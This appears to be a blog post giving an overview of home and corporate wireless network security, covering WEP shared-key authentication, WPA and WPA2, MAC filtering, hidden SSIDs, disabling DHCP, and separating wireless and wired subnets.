Wireless Networks: Security
Wireless home
networks allow you to use your computer from virtually anywhere in the house,
as well as connect to other computers on the network or access the
Internet. A very important aspect to take into account
about wireless networks is security since anyone who can connect to our network
could use our services and even read the exchange of information from our
machine with other hosts or the Internet. However, if the wireless network is
not secure, there are very significant risks.
- Intercept the data you send or receive
- Access your shared files
- Hijack your Internet connection and use all the bandwidth or download limit
Internet Safety Tips to Protect Your Wireless Network
Here are a few
simple steps you can take to protect your wireless network and routers:
WEP
with shared key
It is the simplest
authentication scheme but also very insecure. With WEP (Wired Equivalent
Privacy) the network has a set of keys that each user must know in order to
connect. The keys can be 40 and 104 bits, with an initialization vector (a
pseudo-random value) of 24 bits, obtaining 64 bits in the first case and 128
bits in the second.
Connecting a client
to a WEP-protected network requires the following steps:
1. The client tells
the AP that it wants to authenticate.
2. The AP responds by
sending you a challenge in plain text. It should be noted that a challenge
is a random string of characters that is used to make sure that the other team
knows the password but without sending it.
3. The client takes
one of the WEP keys it knows for the network encrypts the challenge with it,
and sends it back to the AP.
4. The AP checks the
encrypted text that it received and if it matches the one it calculated
(encrypting the same challenge with the same key) then it authenticates the
client.
Authentication
and encryption
WEP only provides a
weak form of authentication and does not encrypt traffic on the wireless
network. There are, then, other stronger authentication methods that also
provide encryption for the exchanged packets. We can mention two
technologies in this section: WPA and WPA2.
WPA
and WPA2
WPA (Wireless
Protected Access) is an important improvement over WEP, as it uses dynamic keys
to encrypt traffic on the network and also uses TKIP, which is a stronger
authentication algorithm. However, TKIP is only an improvement over RC4
which is WEP's encryption algorithm, thus, although reduced, it still shares
several of the problems of WEP. WPA can use AES which is a very secure
algorithm but requires hardware support, which is why it is optional with
WPA. The difference here with WPA2 is that the latter does not support
TKIP, thus forcing the use of AES.
WPA and WPA2 can
use two authentication modes. They are:
- Enterprise: A RADIUS server is used for authentication.
- Personal: it uses the shared key scheme, which, although it gives less security, is easier to configure and is usually used for a small network or a home.
Other security considerations
There are several
more actions that can be taken to protect a network. The most commons are:
- Filtered by MAC: in this case, a list is made with the MACs of the devices that are allowed to connect to the network, with which the AP will reject any equipment whose MAC is not on the list.
- Hide SSID: As we have seen, the SSID is the name of the network. By hiding it, it is achieved that the network, although present, is not listed among the possible networks to connect to. For this reason, in order to connect to a hidden network, the client must expressly give its SSID.
- Deactivate DHCP: when deactivating DHCP and assuming that a client has been able to connect to the network, then it should know the subnet used in it to be able to use the services.
It is worth
clarifying that the previous methods only add some weak layers of security, effective
for a user without much knowledge but totally useless to stop a person who
spends only a few hours reading on the subject.
-->
-->
A security measure
that is totally independent of all the above has to do with the type of service
to be provided on the wireless network and what access its clients should have
to the wired network. Assuming you have a company with a corporate network
in which access to various services is provided, such as shared files. If
the information is sensitive, it is highly recommended that it be only
accessible through the wired network and not through the wireless network.
A different subnet
is then normally defined for wired and wireless networks, with different
services in each of them. Usually, a firewall is configured in front of the
wireless network that allows for example only web traffic. In this way,
the Internet can be provided to mobile devices, but if they need to access the
corporate network, they must connect with a cable. These types of measures
are highly recommended since even if with all the security implemented,
someone manages to associate with the wireless network, they will not be able
to access the company's services.
<--Awsome website templates are available. You can choose it according to the niche.
-->
Comments
Post a Comment